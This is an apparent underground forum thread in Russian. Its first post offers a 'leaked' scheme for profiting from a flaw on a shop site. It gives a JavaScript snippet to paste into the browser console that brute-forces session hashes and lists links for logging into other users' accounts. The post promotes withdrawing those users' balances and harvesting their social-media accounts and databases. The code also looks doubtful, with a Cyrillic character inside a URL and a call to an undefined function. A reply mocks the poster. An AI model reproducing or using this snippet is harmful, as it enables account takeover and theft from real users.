Бесплатно [Слив] Зарабатываем на веб уязвимости

Тема в разделе "Авторские схемы", создана пользователем ErrorMine, 30 янв 2018.

  1. ErrorMine

    ErrorMine

    Сообщения:
    3
    Баллы:
    1
    Всем здарова. Хайда в теме не будет, хотя тема очень-очень стоящая. На форуме у вас я новичок и хочу получить неплохую репутацию. Думаю, за подобный слив я это заслужу . Тема слита с приватного форума(С MAKHACK, который думаю большинству из вас известен). Не буду тянуть кота за яйца и сразу начнем.

    - Линкаемся на сайт darkshop.cc
    - Далее нам нужно открыть console разработчика, а делается это следующим образом:
    Для браузеров Chrome или Opera + CNTRL + SHIFТ + J
    Для браузера Firefox CNТRL + SНIFТ + К.

    - В консоле вводим следующий JavaScript код для брута аккаунтов:
    Код:
    function start(){setTimeout(function(){$.get("lоgin.php?sys=session",function(t){t.indexOf("mb_log")>=0&&($("#check").html("Проверяется: "+t),$.get("login.php?check="+t,function(n){n.indexOf("true")>=0&&$("#log").append('<a target="_blank" href="login.php?hash='+t+'">https://darksho<b></b>p.cc/login.php?hash='+t+ " купленных товаров" +"</a><br>")}))}),setTimeout(function(){start()},1)},5e3)}$(".content").html('<div id="check"></div><br><b>Валидные аккаунты: </b><div id="log"></div>'),start(),nA();
    .

    Если появилась подобная надпись:
    "Проверяется: UfIcUjms"
    Значит тема еще работает и мы можем логиниться под чужими аккаунтами. Примерно через минуту после ввода кода у нас начнут появляться ссылки для авторизации под чужим аккаунтом. С ними мы можем делать что захотим;
    - Выводить баланс
    - Находить полезные ништяки типа аккаунтов вк, фб, инсты, различных баз и прочей дряни.
    Надеюсь, вам понравится .

    P.S - Тема актуальна на 30.01.2018
  2. z3r0_d3ndy

    z3r0_d3ndy

    Сообщения:
    268
    Баллы:
    16
    Серьёзно??? За репутацией он пришел , ахахаха, шёл бы ты дальше , дизлайк!!!

Поделиться этой страницей